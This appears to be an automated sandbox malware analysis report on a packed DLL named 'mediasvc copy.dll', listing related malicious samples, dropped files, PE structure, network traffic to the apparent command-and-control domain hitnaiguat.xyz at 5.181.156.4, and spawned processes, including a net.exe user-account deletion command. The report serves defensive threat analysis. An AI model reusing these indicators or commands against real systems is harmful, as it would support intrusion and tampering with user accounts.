    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    ce5f3254611a8c095a3d821d44539877usz.exeGet hashmaliciousBrowse
    • 5.181.156.4
    2020-12-03_08-45-45.exe.exeGet hashmaliciousBrowse
    • 5.181.156.4
    20-091232.xlsxGet hashmaliciousBrowse
    • 5.181.156.4
    ipsjz17z.dllGet hashmaliciousBrowse
    • 5.181.156.4
    uzutwotm.exeGet hashmaliciousBrowse
    • 5.181.156.4
    q9y42trS7z.exeGet hashmaliciousBrowse
    • 5.181.156.4
    IaGdBpfkmV.exeGet hashmaliciousBrowse
    • 5.181.156.4
    Vuu0hnOqjF.exeGet hashmaliciousBrowse
    • 5.181.156.4
    Eptinaub3.dllGet hashmaliciousBrowse
    • 5.181.156.4
    otaxujuc64.dllGet hashmaliciousBrowse
    • 5.181.156.4
    Donorcasino.dllGet hashmaliciousBrowse
    • 5.181.156.4
    Visitreflect.dllGet hashmaliciousBrowse
    • 5.181.156.4
    Lijocn.dllGet hashmaliciousBrowse
    • 5.181.156.4
    MT103---USD42,880.45---20201127--dbs--9900.exeGet hashmaliciousBrowse
    • 5.181.156.4
    KeJ7Cl7flZ.exeGet hashmaliciousBrowse
    • 5.181.156.4
    XC65ED9or6.exeGet hashmaliciousBrowse
    • 5.181.156.4
    DHL invoice VNYI564714692.exeGet hashmaliciousBrowse
    • 5.181.156.4
    Order-Poland.exeGet hashmaliciousBrowse
    • 5.181.156.4
    Novi poredak.exeGet hashmaliciousBrowse
    • 5.181.156.4
    Customer Remittance Advice 9876627262822662.exeGet hashmaliciousBrowse
    • 5.181.156.4

    Dropped Files

    No context

    Created / dropped Files

    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_loaddll64.exe_79112354f3f71b6f6a575af175e9c2c07ad4b86_2fcb7175_19e8e0b2\Report.wer
    Process:C:\Windows\System32\WerFault.exe
    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):14288
    Entropy (8bit):3.7503033860323733
    Encrypted:false
    SSDEEP:192:K4+WRrXAH0j5yZjZvkPOY/u7s0S274lt+C:qwrXo0dyZjpY/u7s0X4lt+C
    MD5:2E6CC753F0EC9BCA9F21502A52695241
    SHA1:824CEB6F930E77D1D90E7D1FE54A403E71F69BDD
    SHA-256:04FB834724F94AA997AB3E4E4EA1D51F6D0FC1BB7957AC6244562820CCE57303
    SHA-512:904AE2EC5342F914269741C2099B91D91C3E477B71E56D50B36CE5E9E39C8C4D2E501871F4AF6992E28A7E07F221DA268820DB330A4A6183FAC637EC265E4778
    Malicious:false
    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.4.8.0.7.7.0.6.3.9.0.3.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.4.8.0.7.7.3.3.8.9.0.3.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.5.6.7.5.2.2.-.5.5.d.f.-.4.4.f.4.-.9.b.e.5.-.e.9.b.8.9.2.0.8.3.4.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.f.0.8.1.3.5.-.8.0.9.1.-.4.1.8.8.-.8.1.5.b.-.1.0.1.a.f.d.c.0.6.8.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.6.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.b.-.3.4.3.0.-.7.3.e.9.8.3.c.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.f.e.1.f.7.3.2.2.5.e.8.c.2.3.3.1.b.8.d.3.7.3.d.3.f.9.1.a.c.4.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.0.5.1.5.b.6.5.8.e.2.d.6.9.b.d.2.7.d.f.9.1.9.7.7.9.d.c.5.7.4.6.0.1.4.2.b.a.d.!.l.o.a.d.d.l.l.6.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.3.
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DD.tmp.WERInternalMetadata.xml
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):8744
    Entropy (8bit):3.7028718224539507
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNiXh6V6Yrf2u/Pgmf54SSNKw+pDu89b/g1f8XVm:RrlsNiR6V6YTn/Pgmf54SSgT/afJ
    MD5:AAD05064FB454CCAF3ECB093FA2CDECB
    SHA1:A851BC4F9805A574EF5F5AFC09193478236F0143
    SHA-256:E2B81111A8677478FFE0AA35B29EF717181F84C1F14F6F7DAE8ADEDC22EB8F8B
    SHA-512:9FFB8B6DBE800C177384CC593743F310D6E2CF017E8FC62B2FBE313E6868F881E1728454CBBCD7B2E3BF4A46052A82F89EB47EB15EC7C9BF6196812581074CA2
    Malicious:false
    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.d.>.......
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER316.tmp.xml
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4625
    Entropy (8bit):4.45767563035253
    Encrypted:false
    SSDEEP:48:cvIwSD8zstJgtBI9LzWSC8BU8fm8M4JRfFYAyq85iEFVknvYw4d:uITfHRCSNXJXGFCvt4d
    MD5:7F7FC9E0C43601BA8DAC69683CB9474B
    SHA1:4864D3BC804E9B0E3D4BC0B63554201571E8DD09
    SHA-256:B2386F11E90A44B64367E2696A8894BF9F37261938319E518D47C6FAB1164C15
    SHA-512:C72C6ACA09795609D0BA1B423FCCE1D8B770A0870DD42DEC46D3A5C0EC9E8DA0361D260D0B80B686AFD75AE59B3338B20D967893EA5FA8276F1BEDC0CEBB1B7A
    Malicious:false
    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756003" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC3E.tmp.dmp
    Process:C:\Windows\System32\WerFault.exe
    File Type:Mini DuMP crash report, 15 streams, Thu Dec 3 14:52:51 2020, 0x1205a4 type
    Category:dropped
    Size (bytes):178206
    Entropy (8bit):1.429943243836479
    Encrypted:false
    SSDEEP:384:YayNs4daHRsUOWaIM3Rs5mdomTfo4WxZq2zHgx6sURpzZ8r6Wh3gX3p:1us4daHRsUGN3R1omTfUrq0gx6a6Wd0
    MD5:84A856A7E08939AE99CFEDEA84E06C36
    SHA1:38BF59D7261ED618E49660B33AB99B05D957EE94
    SHA-256:F65F56C9966AB68D9BC63084791FE71DC8A60E4C3D0C96B1157B9D9CA46E33AB
    SHA-512:D096DF109E8E936F62A6A0A1A753882A43017790A00685325B9F58879898C0355570F7D29F5F726F7A75420A7F449A722A0204B9CB41CD444157091A5BE82143
    Malicious:false
    Preview: MDMP....... .........._...................U...........B.......)......Lw......................T.............._.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
    C:\Users\user\AppData\Local\Temp\FPIXLWRM
    Process:C:\Windows\System32\loaddll64.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):112
    Entropy (8bit):5.1817198784922915
    Encrypted:false
    SSDEEP:3:UOtMASXv5OJdZ9UqTxRaBMqKLfddQK01HXNMLERfRvMJDunMovn:U6S/5OvVxcBZQf3f0kLefOJov
    MD5:DDB78DA819BC91AD508D08390AE3A054
    SHA1:6B3A871EC05136AD9AD9BFD06DE3BDF9E02AA92F
    SHA-256:AB5039671193F3E0DB88E27C9755B82FE0BA32ED534B3C7E9113B4708B93142B
    SHA-512:2004AD0DEC167A9E3EA536B701B4B747529F32D76996465781D73B4D6C705D21881D7A282D1CBBB70244793798FC0EFC650C2B4F7EF99B86C8B7782389386BBE
    Malicious:false
    Preview: jul12;Windows 10 (Version 10.0, Build 17134, 64-bit Edition);x64;user;nouser;winacc:WgaUtilAcc;ph9ZVf2Q;92392..

    Static File Info

    General

    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Entropy (8bit):7.997912954937728
    TrID:
    • Win64 Dynamic Link Library (generic) (102004/3) 68.65%
    • UPX compressed Win32 Executable (30571/9) 20.57%
    • Win64 Executable (generic) (12005/4) 8.08%
    • Generic Win/DOS Executable (2004/3) 1.35%
    • DOS Executable Generic (2002/1) 1.35%
    File name:mediasvc copy.dll
    File size:967168
    MD5:7be1e51fdc4a8174e82df8b2d6825f8e
    SHA1:0e20003e34874d330db3b7ecd7f5824055645e3b
    SHA256:6b6b820f47b2bf72296aa4ef031a80df04fb951ecf3accfed9bb0289373f45bc
    SHA512:c095b01538c7c23709852284aed3bc35864bbba1d6f4effa41655e403a74587277fdad5c02545da7f256392b23e6a9cdeefcf35481e2d36e59bab1a0370077c2
    SSDEEP:24576:XtE8wsC5inKOYXDUnBwfYb5QvFEIY2ucmzyw267NPC:XTLs1wos6cc0267N6
    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

    File Icon

    Icon Hash:74f0e4ecccdce0e4

    Static PE Info

    General

    Entrypoint:0x5ae380
    Entrypoint Section:UPX1
    Digitally signed:false
    Imagebase:0x10000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x5F0BC77C [Mon Jul 13 02:31:24 2020 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:4
    File Version Major:5
    File Version Minor:4
    Subsystem Version Major:5
    Subsystem Version Minor:4
    Import Hash:5f1a5d33cb08f2c4991f83d7db394565

    Entrypoint Preview

    Instruction
    dec eax
    mov dword ptr [esp+08h], ecx
    dec eax
    mov dword ptr [esp+10h], edx
    dec esp
    mov dword ptr [esp+18h], eax
    cmp dl, 00000001h
    jne 00007F34B90B92DFh
    push ebx
    push esi
    push edi
    push ebp
    dec eax
    lea esi, dword ptr [FFF15C5Dh]
    dec eax
    lea edi, dword ptr [esi-004B3000h]
    push edi
    mov eax, 0059C16Ch
    push eax
    dec eax
    mov ecx, esp
    dec eax
    mov edx, edi
    dec eax
    mov edi, esi
    mov esi, 000EA37Bh
    push ebp
    dec eax
    mov ebp, esp
    inc esp
    mov ecx, dword ptr [ecx]
    dec ecx
    mov eax, edx
    dec eax
    mov edx, esi
    dec eax
    lea esi, dword ptr [edi+02h]
    push esi
    mov al, byte ptr [edi]
    dec edx
    mov cl, al
    and al, 07h
    shr cl, 00000003h
    dec eax
    mov ebx, FFFFFD00h
    dec eax
    shl ebx, cl
    mov cl, al
    dec eax
    lea ebx, dword ptr [esp+ebx*2-00000E78h]
    dec eax
    and ebx, FFFFFFC0h
    push 00000000h
    dec eax
    cmp esp, ebx
    jne 00007F34B90B870Bh
    push ebx
    dec eax
    lea edi, dword ptr [ebx+08h]
    mov cl, byte ptr [esi-01h]
    dec edx
    mov byte ptr [edi+02h], al
    mov al, cl
    shr cl, 00000004h
    mov byte ptr [edi+01h], cl
    and al, 0Fh
    mov byte ptr [edi], al
    dec eax
    lea ecx, dword ptr [edi-04h]
    push eax
    inc ecx
    push edi
    dec eax
    lea eax, dword ptr [edi+04h]
    inc ebp
    xor edi, edi
    inc ecx
    push esi
    inc ecx
    mov esi, 00000001h
    inc ecx
    push ebp
    inc ebp
    xor ebp, ebp
    inc ecx
    push esp
    push ebp
    push ebx
    dec eax
    mov dword ptr [esp-10h], ecx
    dec eax
    mov dword ptr [esp-28h], eax
    mov eax, 00000001h
    dec eax
    mov dword ptr [esp-08h], esi

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x59fcd00xd4.rsrc
    IMAGE_DIRECTORY_ENTRY_IMPORT0x59f9300x3a0.rsrc
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x59f0000x930.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x53c0000x3cf54UPX1
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x5060000x6UPX1
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5030000x1212UPX1
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    UPX00x10000x4b30000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
    UPX10x4b40000xeb0000xeb000False0.999005776263ARC archive data, packed7.99972664559IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x59f0000x10000xe00False0.351004464286data3.55549750023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_CURSOR0x5799300x134dataEnglishUnited States
    RT_CURSOR0x579a640x134dataEnglishUnited States
    RT_CURSOR0x579b980x134dataEnglishUnited States
    RT_CURSOR0x579ccc0x134dataEnglishUnited States
    RT_CURSOR0x579e000x134dataEnglishUnited States
    RT_CURSOR0x579f340x134dataEnglishUnited States
    RT_CURSOR0x57a0680x134dataEnglishUnited States
    RT_STRING0x57a19c0x3ecdata
    RT_STRING0x57a5880x368data
    RT_STRING0x57a8f00x40cCOM executable for DOS
    RT_STRING0x57acfc0xd4data
    RT_STRING0x57add00xccdata
    RT_STRING0x57ae9c0x2ccdata
    RT_STRING0x57b1680x3acdata
    RT_STRING0x57b5140x3b0data
    RT_STRING0x57b8c40x3bcdata
    RT_STRING0x57bc800x414data
    RT_STRING0x57c0940x4c4data
    RT_STRING0x57c5580x558data
    RT_STRING0x57cab00x2dcdata
    RT_STRING0x57cd8c0x3bcdata
    RT_STRING0x57d1480x378data
    RT_STRING0x57d4c00x510data
    RT_STRING0x57d9d00x53cdata
    RT_STRING0x57df0c0x380data
    RT_STRING0x57e28c0x3d4data
    RT_STRING0x57e6600x414data
    RT_STRING0x57ea740x138data
    RT_STRING0x57ebac0xccdata
    RT_STRING0x57ec780x1f8data
    RT_STRING0x57ee700x40cdata
    RT_STRING0x57f27c0x390data
    RT_STRING0x57f60c0x310data
    RT_STRING0x57f91c0x2e8data
    RT_RCDATA0x57fc040xcdata
    RT_RCDATA0x57fc100x10Non-ISO extended-ASCII text, with no line terminators
    RT_RCDATA0x57fc200x7a0data
    RT_RCDATA0x5803c00x159data
    RT_GROUP_CURSOR0x58051c0x14Non-ISO extended-ASCII textEnglishUnited States
    RT_GROUP_CURSOR0x5805300x14dataEnglishUnited States
    RT_GROUP_CURSOR0x5805440x14dataEnglishUnited States
    RT_GROUP_CURSOR0x5805580x14dataEnglishUnited States
    RT_GROUP_CURSOR0x58056c0x14dataEnglishUnited States
    RT_GROUP_CURSOR0x5805800x14dataEnglishUnited States
    RT_GROUP_CURSOR0x5805940x14dataEnglishUnited States

    Imports

    DLLImport
    advapi32.dllRegLoadKeyW
    comctl32.dllImageList_Add
    gdi32.dllPie
    KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect
    msvcrt.dllmemcpy
    netapi32.dllNetWkstaGetInfo
    ole32.dllOleDraw
    oleaut32.dllVariantInit
    shell32.dllShellExecuteW
    user32.dllGetDC
    version.dllVerQueryValueW
    winhttp.dllWinHttpOpen
    winspool.drvClosePrinter
    Wtsapi32.dllWTSFreeMemory

    Exports

    NameOrdinalAddress
    TMethodImplementationIntercept30xad6b0
    __dbk_fcall_wrapper20x2be30
    dbkFCallWrapperAddr10x49c298
    euefnaiw50x4262a0
    gusiezo360x4261e0
    hitit40x4262f0

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 3, 2020 15:52:35.089778900 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.144726992 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.149090052 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.155551910 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.210463047 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.215367079 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.215411901 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.215436935 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.215590954 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.222596884 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.281742096 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:35.333452940 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.373291016 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.373730898 CET49740443192.168.2.45.181.156.4
    Dec 3, 2020 15:52:35.428510904 CET443497405.181.156.4192.168.2.4
    Dec 3, 2020 15:52:46.992223024 CET49740443192.168.2.45.181.156.4

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 3, 2020 15:52:25.856897116 CET5585453192.168.2.48.8.8.8
    Dec 3, 2020 15:52:25.883210897 CET53558548.8.8.8192.168.2.4
    Dec 3, 2020 15:52:26.859575033 CET6454953192.168.2.48.8.8.8
    Dec 3, 2020 15:52:26.894212008 CET53645498.8.8.8192.168.2.4
    Dec 3, 2020 15:52:28.021080017 CET6315353192.168.2.48.8.8.8
    Dec 3, 2020 15:52:28.047425032 CET53631538.8.8.8192.168.2.4
    Dec 3, 2020 15:52:29.503525019 CET5299153192.168.2.48.8.8.8
    Dec 3, 2020 15:52:29.529587984 CET53529918.8.8.8192.168.2.4
    Dec 3, 2020 15:52:32.355606079 CET5370053192.168.2.48.8.8.8
    Dec 3, 2020 15:52:32.381675005 CET53537008.8.8.8192.168.2.4
    Dec 3, 2020 15:52:33.529457092 CET5172653192.168.2.48.8.8.8
    Dec 3, 2020 15:52:33.555624962 CET53517268.8.8.8192.168.2.4
    Dec 3, 2020 15:52:34.355046034 CET5679453192.168.2.48.8.8.8
    Dec 3, 2020 15:52:34.381167889 CET53567948.8.8.8192.168.2.4
    Dec 3, 2020 15:52:35.038105011 CET5653453192.168.2.48.8.8.8
    Dec 3, 2020 15:52:35.076292038 CET53565348.8.8.8192.168.2.4
    Dec 3, 2020 15:52:35.480837107 CET5662753192.168.2.48.8.8.8
    Dec 3, 2020 15:52:35.515355110 CET53566278.8.8.8192.168.2.4
    Dec 3, 2020 15:52:38.948534966 CET5662153192.168.2.48.8.8.8
    Dec 3, 2020 15:52:38.974627972 CET53566218.8.8.8192.168.2.4
    Dec 3, 2020 15:52:40.224188089 CET6311653192.168.2.48.8.8.8
    Dec 3, 2020 15:52:40.258690119 CET53631168.8.8.8192.168.2.4
    Dec 3, 2020 15:52:42.031430006 CET6407853192.168.2.48.8.8.8
    Dec 3, 2020 15:52:42.066442966 CET53640788.8.8.8192.168.2.4
    Dec 3, 2020 15:52:44.166969061 CET6480153192.168.2.48.8.8.8
    Dec 3, 2020 15:52:44.203794956 CET53648018.8.8.8192.168.2.4
    Dec 3, 2020 15:52:45.211930037 CET6172153192.168.2.48.8.8.8
    Dec 3, 2020 15:52:45.238080978 CET53617218.8.8.8192.168.2.4
    Dec 3, 2020 15:52:47.699316978 CET5125553192.168.2.48.8.8.8
    Dec 3, 2020 15:52:47.725534916 CET53512558.8.8.8192.168.2.4
    Dec 3, 2020 15:52:49.272108078 CET6152253192.168.2.48.8.8.8
    Dec 3, 2020 15:52:49.298297882 CET53615228.8.8.8192.168.2.4
    Dec 3, 2020 15:52:54.585472107 CET5233753192.168.2.48.8.8.8
    Dec 3, 2020 15:52:54.611776114 CET53523378.8.8.8192.168.2.4
    Dec 3, 2020 15:53:10.119601011 CET5504653192.168.2.48.8.8.8
    Dec 3, 2020 15:53:10.156373024 CET53550468.8.8.8192.168.2.4
    Dec 3, 2020 15:53:13.319103956 CET4961253192.168.2.48.8.8.8
    Dec 3, 2020 15:53:13.356868982 CET53496128.8.8.8192.168.2.4
    Dec 3, 2020 15:53:13.990766048 CET4928553192.168.2.48.8.8.8
    Dec 3, 2020 15:53:14.025850058 CET53492858.8.8.8192.168.2.4
    Dec 3, 2020 15:53:14.439161062 CET5060153192.168.2.48.8.8.8
    Dec 3, 2020 15:53:14.473927975 CET53506018.8.8.8192.168.2.4
    Dec 3, 2020 15:53:14.887893915 CET6087553192.168.2.48.8.8.8
    Dec 3, 2020 15:53:14.922708035 CET53608758.8.8.8192.168.2.4
    Dec 3, 2020 15:53:15.161716938 CET5644853192.168.2.48.8.8.8
    Dec 3, 2020 15:53:15.211390018 CET53564488.8.8.8192.168.2.4
    Dec 3, 2020 15:53:15.256277084 CET5917253192.168.2.48.8.8.8
    Dec 3, 2020 15:53:15.290766954 CET53591728.8.8.8192.168.2.4
    Dec 3, 2020 15:53:15.687552929 CET6242053192.168.2.48.8.8.8
    Dec 3, 2020 15:53:15.722265959 CET53624208.8.8.8192.168.2.4
    Dec 3, 2020 15:53:16.205612898 CET6057953192.168.2.48.8.8.8
    Dec 3, 2020 15:53:16.240014076 CET53605798.8.8.8192.168.2.4
    Dec 3, 2020 15:53:17.263675928 CET5018353192.168.2.48.8.8.8
    Dec 3, 2020 15:53:17.298337936 CET53501838.8.8.8192.168.2.4
    Dec 3, 2020 15:53:18.820414066 CET6153153192.168.2.48.8.8.8
    Dec 3, 2020 15:53:18.894948959 CET53615318.8.8.8192.168.2.4
    Dec 3, 2020 15:53:20.318783998 CET4922853192.168.2.48.8.8.8
    Dec 3, 2020 15:53:20.353596926 CET53492288.8.8.8192.168.2.4
    Dec 3, 2020 15:53:25.435956955 CET5979453192.168.2.48.8.8.8
    Dec 3, 2020 15:53:25.471545935 CET53597948.8.8.8192.168.2.4
    Dec 3, 2020 15:53:26.896398067 CET5591653192.168.2.48.8.8.8
    Dec 3, 2020 15:53:26.930969000 CET53559168.8.8.8192.168.2.4
    Dec 3, 2020 15:54:01.162615061 CET5275253192.168.2.48.8.8.8
    Dec 3, 2020 15:54:01.188993931 CET53527528.8.8.8192.168.2.4
    Dec 3, 2020 15:54:01.843058109 CET6054253192.168.2.48.8.8.8
    Dec 3, 2020 15:54:01.879997015 CET53605428.8.8.8192.168.2.4

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Dec 3, 2020 15:52:35.038105011 CET192.168.2.48.8.8.80x4bfaStandard query (0)hitnaiguat.xyzA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Dec 3, 2020 15:52:35.076292038 CET8.8.8.8192.168.2.40x4bfaNo error (0)hitnaiguat.xyz5.181.156.4A (IP address)IN (0x0001)

    HTTPS Packets

    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
    Dec 3, 2020 15:52:35.215411901 CET5.181.156.4443192.168.2.449740CN=www.hitnaiguat.xyz CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Nov 03 16:49:44 CET 2020 Thu Mar 17 17:40:46 CET 2016Mon Feb 01 16:49:44 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
    CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

    Code Manipulations

    Statistics

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:15:52:24
    Start date:03/12/2020
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe 'C:\Users\user\Desktop\mediasvc copy.dll'
    Imagebase:0x7ff7f6f00000
    File size:145920 bytes
    MD5 hash:60CEF63D678C884BE51A4BDBC9FC1ED5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Reputation:low

    General

    Start time:15:52:25
    Start date:03/12/2020
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,TMethodImplementationIntercept
    Imagebase:0x7ff630ed0000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:25
    Start date:03/12/2020
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd /C net.exe user WgaUtilAcc 000000 /del
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:15:52:26
    Start date:03/12/2020
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net.exe user WgaUtilAcc 000000 /del
    Imagebase:0x7ff7fdd20000
    File size:56832 bytes
    MD5 hash:15534275EDAABC58159DD0F8607A71E5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
